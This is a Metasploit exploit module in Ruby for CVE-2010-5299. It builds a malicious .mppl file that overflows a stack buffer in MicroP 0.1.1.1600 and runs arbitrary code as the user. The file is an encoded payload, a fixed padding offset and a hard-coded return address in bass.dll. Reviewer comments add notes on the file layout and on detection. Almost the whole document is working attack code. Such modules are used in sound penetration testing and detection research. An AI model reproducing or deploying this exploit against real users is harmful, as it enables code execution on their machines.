##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# File-format module for CVE-2010-5299: produces a crafted .mppl file aimed at
# a stack-based buffer overflow in MicroP 0.1.1.1600. The class mixes in
# Msf::Exploit::FILEFORMAT and its only output is the file written by
# file_create; nothing in this class opens a network connection.
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
# Registers the module metadata (references, payload constraints, the single
# target) and the FILENAME option.
#
# @param info [Hash] caller-supplied metadata, handed to update_info together
#   with the values declared below
def initialize(info = {})
super(update_info(info,
'Name' => 'MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow',
# NOTE(review): "results arbitrary code execution" below is missing "in". The
# description is runtime metadata, so the string is left untouched here.
'Description' => %q{
This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based
buffer overflow occurs when the content of a .mppl file gets copied onto the stack,
which overwrites the lpFileName parameter of a CreateFileA() function, and results
arbitrary code execution under the context of the user.
},
'License' => MSF_LICENSE,
'Author' => [ 'James Fitts <fitts.james[at]gmail.com>' ],
# Advisory identifiers for the flaw; useful for matching against vulnerability
# scanner output and patch inventories.
'References' =>
[
[ 'CVE', '2010-5299' ],
[ 'OSVDB', '73627'],
[ 'EDB', '14720' ],
],
# The payload handler is disabled by default; this module only generates a
# file (see #exploit).
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => true
},
# Payload budget is 728 bytes and the encoded payload must avoid NUL, LF and CR.
# NOTE(review): presumably those bytes terminate the copy in the file parser;
# confirm against the application.
'Payload' =>
{
'Space' => 728,
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
# A single target entry covers all listed Windows versions.
'Targets' =>
[
[
'Windows XP SP3 / Vista / 7',
{
# 'Ret' is a hard-coded address. NOTE(review): this presumes bass.dll loads
# at the same base on every listed OS (i.e. is not relocated or
# ASLR-randomized) - TODO confirm. A relocated module would not match it.
'Ret' => 0x100145b5, #jmp eax in bass.dll
'Offset' => 1276, #Offset to overwrite EIP
}
],
],
'Privileged' => false,
'DisclosureDate' => '2010-08-23',
'DefaultTarget' => 0))
# FILENAME is a required string option with the default 'msf.mppl'.
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.mppl']),
])
end
# Builds the file content and writes it out through file_create.
#
# Content layout, in order: the encoded payload, random alphabetic padding up
# to target['Offset'] (1276) bytes in total, then the return address as a
# 4-byte little-endian value, which makes 1280 bytes overall.
#
# For detection work: the padding is alphabetic and the payload is encoded to
# avoid NUL/LF/CR, so the content is presumably one unbroken 1280-byte run.
# Compare that shape against legitimate .mppl files before alerting on it.
def exploit
# mppl refers to the same String object that payload.encoded returned, so the
# << calls below append to that object in place.
mppl = payload.encoded
# The padding length is evaluated before the append happens, so it is based on
# the payload's own length. Space (728) is below Offset (1276), so the
# difference is not expected to be negative.
mppl << rand_text_alpha(target['Offset'] - payload.encoded.length)
# pack('V') emits the address as a 32-bit unsigned little-endian integer.
mppl << [target.ret].pack('V')
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(mppl)
end
end